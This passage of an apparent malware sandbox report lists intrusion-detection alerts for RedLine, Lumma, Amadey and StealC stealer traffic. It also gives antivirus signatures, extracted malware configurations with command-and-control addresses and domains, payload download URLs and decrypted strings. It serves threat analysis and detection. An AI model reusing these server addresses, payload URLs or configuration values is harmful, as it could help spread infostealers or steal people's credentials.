Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 65.21.18.51

Timestamp:	2024-08-31T15:44:22.799350+0200
SID:	2043231
Severity:	1
Source Port:	49721
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 65.21.18.51

Timestamp:	2024-08-31T15:44:18.903245+0200
SID:	2043231
Severity:	1
Source Port:	49721
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related Activity - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T15:44:35.025912+0200
SID:	2049836
Severity:	1
Source Port:	49733
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T15:44:35.025912+0200
SID:	2054653
Severity:	1
Source Port:	49733
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 65.21.18.51

Timestamp:	2024-08-31T15:44:21.144465+0200
SID:	2043231
Severity:	1
Source Port:	49721
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 65.21.18.51

Timestamp:	2024-08-31T15:44:11.669348+0200
SID:	2043231
Severity:	1
Source Port:	49721
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) - Source IP: 192.168.2.5 - Destination IP: 65.21.18.51

Timestamp:	2024-08-31T15:44:11.669348+0200
SID:	2046045
Severity:	1
Source Port:	49721
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-08-31T15:44:33.772607+0200
SID:	2044696
Severity:	1
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 95.179.250.45

Timestamp:	2024-08-31T15:44:15.200447+0200
SID:	2043231
Severity:	1
Source Port:	49715
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 95.179.250.45

Timestamp:	2024-08-31T15:44:16.760096+0200
SID:	2043231
Severity:	1
Source Port:	49715
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 95.179.250.45

Timestamp:	2024-08-31T15:44:19.711350+0200
SID:	2043231
Severity:	1
Source Port:	49715
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 65.21.18.51

Timestamp:	2024-08-31T15:44:19.249564+0200
SID:	2043231
Severity:	1
Source Port:	49721
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 185.215.113.17

Timestamp:	2024-08-31T15:44:31.659454+0200
SID:	2803304
Severity:	3
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 95.179.250.45

Timestamp:	2024-08-31T15:44:17.001521+0200
SID:	2043231
Severity:	1
Source Port:	49715
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-08-31T15:44:35.678531+0200
SID:	2044623
Severity:	1
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related Activity M2 - Source IP: 192.168.2.5 - Destination IP: 188.114.97.3

Timestamp:	2024-08-31T15:44:36.842803+0200
SID:	2049812
Severity:	1
Source Port:	49736
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.97.3

Timestamp:	2024-08-31T15:44:36.842803+0200
SID:	2054653
Severity:	1
Source Port:	49736
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 65.21.18.51

Timestamp:	2024-08-31T15:44:17.469723+0200
SID:	2043231
Severity:	1
Source Port:	49721
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) - Source IP: 192.168.2.5 - Destination IP: 1.1.1.1

Timestamp:	2024-08-31T15:44:35.035718+0200
SID:	2055483
Severity:	1
Source Port:	57972
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 52.212.52.84

Timestamp:	2024-08-31T15:44:05.008880+0200
SID:	2803305
Severity:	3
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 95.179.250.45

Timestamp:	2024-08-31T15:44:17.225185+0200
SID:	2043231
Severity:	1
Source Port:	49715
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-08-31T15:44:24.619801+0200
SID:	2803305
Severity:	3
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-08-31T15:44:53.239933+0200
SID:	2803305
Severity:	3
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Amadey Bot Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-08-31T15:44:38.358770+0200
SID:	2044623
Severity:	1
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-08-31T15:44:06.807798+0200
SID:	2044696
Severity:	1
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 95.179.250.45

Timestamp:	2024-08-31T15:44:14.003489+0200
SID:	2043231
Severity:	1
Source Port:	49715
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 65.21.18.51

Timestamp:	2024-08-31T15:44:22.486824+0200
SID:	2043231
Severity:	1
Source Port:	49721
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related Activity - Source IP: 192.168.2.5 - Destination IP: 188.114.97.3

Timestamp:	2024-08-31T15:44:35.662639+0200
SID:	2049836
Severity:	1
Source Port:	49735
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.97.3

Timestamp:	2024-08-31T15:44:35.662639+0200
SID:	2054653
Severity:	1
Source Port:	49735
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-08-31T15:44:48.916720+0200
SID:	2803305
Severity:	3
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 95.179.250.45

Timestamp:	2024-08-31T15:44:19.525335+0200
SID:	2043231
Severity:	1
Source Port:	49715
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 95.179.250.45

Timestamp:	2024-08-31T15:44:17.694085+0200
SID:	2043231
Severity:	1
Source Port:	49715
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 194.58.114.223

Timestamp:	2024-08-31T15:44:56.288928+0200
SID:	2803305
Severity:	3
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T15:45:03.063415+0200
SID:	2044597
Severity:	1
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T15:45:10.348700+0200
SID:	2044597
Severity:	1
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 95.179.250.45

Timestamp:	2024-08-31T15:44:19.899025+0200
SID:	2043231
Severity:	1
Source Port:	49715
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 185.215.113.17

Timestamp:	2024-08-31T15:44:32.848488+0200
SID:	2803304
Severity:	3
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T15:45:06.228728+0200
SID:	2044597
Severity:	1
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 65.21.18.51

Timestamp:	2024-08-31T15:44:19.674480+0200
SID:	2043231
Severity:	1
Source Port:	49721
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T15:45:11.958854+0200
SID:	2044696
Severity:	1
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 95.179.250.45

Timestamp:	2024-08-31T15:44:13.811040+0200
SID:	2043231
Severity:	1
Source Port:	49715
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 95.179.250.45

Timestamp:	2024-08-31T15:44:08.253213+0200
SID:	2043231
Severity:	1
Source Port:	49715
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) - Source IP: 192.168.2.5 - Destination IP: 95.179.250.45

Timestamp:	2024-08-31T15:44:08.253213+0200
SID:	2046045
Severity:	1
Source Port:	49715
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 65.21.18.51

Timestamp:	2024-08-31T15:44:20.822289+0200
SID:	2043231
Severity:	1
Source Port:	49721
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T15:44:54.794194+0200
SID:	2044597
Severity:	1
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Response M1 - Source IP: 185.215.113.16 - Destination IP: 192.168.2.5

Timestamp:	2024-08-31T15:44:06.066742+0200
SID:	2856122
Severity:	1
Source Port:	80
Destination Port:	49712
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 185.215.113.17

Timestamp:	2024-08-31T15:44:35.832677+0200
SID:	2803304
Severity:	3
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 185.215.113.17

Timestamp:	2024-08-31T15:44:18.637700+0200
SID:	2803304
Severity:	3
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T15:44:57.101399+0200
SID:	2044597
Severity:	1
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 95.179.250.45

Timestamp:	2024-08-31T15:44:18.862016+0200
SID:	2043231
Severity:	1
Source Port:	49715
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 185.215.113.17

Timestamp:	2024-08-31T15:44:33.580054+0200
SID:	2803304
Severity:	3
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 104.21.21.16

Timestamp:	2024-08-31T15:45:06.383204+0200
SID:	2803305
Severity:	3
Source Port:	49765
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 95.179.250.45

Timestamp:	2024-08-31T15:44:17.699313+0200
SID:	2043231
Severity:	1
Source Port:	49715
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc Submitting System Information to C2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.17

Timestamp:	2024-08-31T15:44:18.143308+0200
SID:	2044248
Severity:	1
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Lumma Stealer Related Activity - Source IP: 192.168.2.5 - Destination IP: 188.114.97.3

Timestamp:	2024-08-31T15:45:03.257814+0200
SID:	2049836
Severity:	1
Source Port:	49760
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.97.3

Timestamp:	2024-08-31T15:45:03.257814+0200
SID:	2054653
Severity:	1
Source Port:	49760
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-08-31T15:44:24.195303+0200
SID:	2044696
Severity:	1
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T15:45:11.818702+0200
SID:	2044597
Severity:	1
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc Requesting plugins Config from C2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.17

Timestamp:	2024-08-31T15:44:17.020395+0200
SID:	2044246
Severity:	1
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 95.179.250.45

Timestamp:	2024-08-31T15:44:19.339385+0200
SID:	2043231
Severity:	1
Source Port:	49715
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related Activity - Source IP: 192.168.2.5 - Destination IP: 188.114.97.3

Timestamp:	2024-08-31T15:44:33.953102+0200
SID:	2049836
Severity:	1
Source Port:	49731
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.97.3

Timestamp:	2024-08-31T15:44:33.953102+0200
SID:	2054653
Severity:	1
Source Port:	49731
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) - Source IP: 192.168.2.5 - Destination IP: 188.114.97.3

Timestamp:	2024-08-31T15:44:36.202490+0200
SID:	2055493
Severity:	1
Source Port:	49736
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 65.21.18.51

Timestamp:	2024-08-31T15:44:22.279526+0200
SID:	2043231
Severity:	1
Source Port:	49721
Destination Port:	45580
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 185.215.113.17

Timestamp:	2024-08-31T15:44:29.068952+0200
SID:	2803304
Severity:	3
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-08-31T15:44:48.671815+0200
SID:	2044696
Severity:	1
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T15:44:59.890009+0200
SID:	2044597
Severity:	1
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.17

Timestamp:	2024-08-31T15:44:16.506266+0200
SID:	2044244
Severity:	1
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 95.179.250.45

Timestamp:	2024-08-31T15:44:14.879173+0200
SID:	2043231
Severity:	1
Source Port:	49715
Destination Port:	26212
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: OmnqazpM3P.exe

Avira: detected

Antivirus detection for URL or domain

Source: locatedblsoqp.shop	URL Reputation: Label: phishing
Source: locatedblsoqp.shop	URL Reputation: Label: phishing
Source: traineiwnqo.shop	URL Reputation: Label: malware
Source: traineiwnqo.shop	URL Reputation: Label: malware
Source: https://locatedblsoqp.shop/api	URL Reputation: Label: malware
Source: http://185.215.113.16/inc/crypteda.exe=	Avira URL Cloud: Label: phishing
Source: caffegclasiqwp.shop	URL Reputation: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.phpeW	Avira URL Cloud: Label: phishing
Source: condedqpwqm.shop	URL Reputation: Label: phishing
Source: stagedchheiqwo.shop	URL Reputation: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpTAL;	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpncoded	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/CoreOPT/index.php369.jpg	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/inc/BitcoinCore.exe	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/CoreOPT/index.php	Avira URL Cloud: Label: phishing
Source: http://185.215.113.17/2fb6c2cc8dce150a.php0	Avira URL Cloud: Label: malware
Source: http://185.215.113.17/2fb6c2cc8dce150a.php3	Avira URL Cloud: Label: malware
Source: https://locatedblsoqp.shop/	Avira URL Cloud: Label: phishing
Source: http://185.215.113.17/2fb6c2cc8dce150a.php-	Avira URL Cloud: Label: malware
Source: http://185.215.113.17/2fb6c2cc8dce150a.phpE	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/ows	Avira URL Cloud: Label: phishing
Source: http://185.215.113.17/2fb6c2cc8dce150a.php;	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.phpncodeda	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/inc/Amadeus.exe5c7cf18	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/d	Avira URL Cloud: Label: phishing
Source: https://traineiwnqo.shop/apim:b	Avira URL Cloud: Label: malware
Source: http://185.215.113.17/2fb6c2cc8dce150a.phpa	Avira URL Cloud: Label: malware
Source: http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll	Avira URL Cloud: Label: malware
Source: https://evoliutwoqm.shop/api	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.phpST.	Avira URL Cloud: Label: phishing

Found malware configuration

Source: 00000014.00000002.3033783708.000000000168E000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php"}
Source: 00000007.00000002.2691967398.0000000003FC5000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": "95.179.250.45:26212", "Bot Id": "LiveTraffic", "Message": "Error! Disable antivirus and try again!", "Authorization Header": "143feb5082f9936e624c1e27545e7d19"}
Source: 24.3.PureSyncInst.exe.1d10000.0.raw.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["condedqpwqm.shop", "traineiwnqo.shop", "stamppreewntnq.shop", "stagedchheiqwo.shop", "locatedblsoqp.shop", "caffegclasiqwp.shop", "evoliutwoqm.shop", "millyscroqwp.shop"], "Build id": "tLYMe5--newnew"}
Source: 37.2.Amadeus.exe.e20000.0.unpack	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.19/CoreOPT/index.php", "Version": "4.41", "Install Folder": "417fd29867", "Install File": "ednfoki.exe"}
Source: 20.2.stealc_default2.exe.ce0000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default2"}

Multi AV Scanner detection for domain / URL

Source: femininedspzmhu.shop	Virustotal: Detection: 11%	Perma Link
Source: ddl.safone.dev	Virustotal: Detection: 10%	Perma Link
Source: http://185.215.113.16/Jo89Ku7d/index.phpeW	Virustotal: Detection: 22%	Perma Link
Source: http://185.215.113.16/Jo89Ku7d/index.phpncoded	Virustotal: Detection: 8%	Perma Link
Source: http://194.58.114.223/	Virustotal: Detection: 13%	Perma Link
Source: http://ddl.safone.dev/3827530/caesium-image-compressor.exe?hash=AgADPx	Virustotal: Detection: 9%	Perma Link
Source: http://185.215.113.16/inc/BitcoinCore.exe	Virustotal: Detection: 19%	Perma Link
Source: http://185.215.113.19/CoreOPT/index.php	Virustotal: Detection: 18%	Perma Link
Source: http://185.215.113.17/2fb6c2cc8dce150a.php0	Virustotal: Detection: 18%	Perma Link
Source: http://185.215.113.17/2fb6c2cc8dce150a.php3	Virustotal: Detection: 18%	Perma Link
Source: http://185.215.113.17/2fb6c2cc8dce150a.php-	Virustotal: Detection: 18%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Nework[1].exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\PureSyncInst[1].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\BitcoinCore[1].exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\crypteda[1].exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\runtime[1].exe	ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\stealc_default2[1].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\caesium-image-compressor[1].exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\crypted[1].exe	ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	ReversingLabs: Detection: 87%

Multi AV Scanner detection for submitted file

Source: OmnqazpM3P.exe	Virustotal: Detection: 58%			Perma Link
Source: OmnqazpM3P.exe	ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Joe Sandbox ML: detected
Source: C:\Users\user\1000238002\Amadeus.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Amadeus[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\setup[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\stealc_default2[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Nework[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\crypteda[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\runtime[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: OmnqazpM3P.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp	String decryptor: caffegclasiqwp.shop
Source: 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp	String decryptor: stamppreewntnq.shop
Source: 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp	String decryptor: stagedchheiqwo.shop
Source: 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp	String decryptor: millyscroqwp.shop
Source: 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp	String decryptor: evoliutwoqm.shop
Source: 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp	String decryptor: condedqpwqm.shop
Source: 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp	String decryptor: traineiwnqo.shop
Source: 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp	String decryptor: locatedblsoqp.shop
Source: 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp	String decryptor: femininedspzmhu.shop
Source: 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
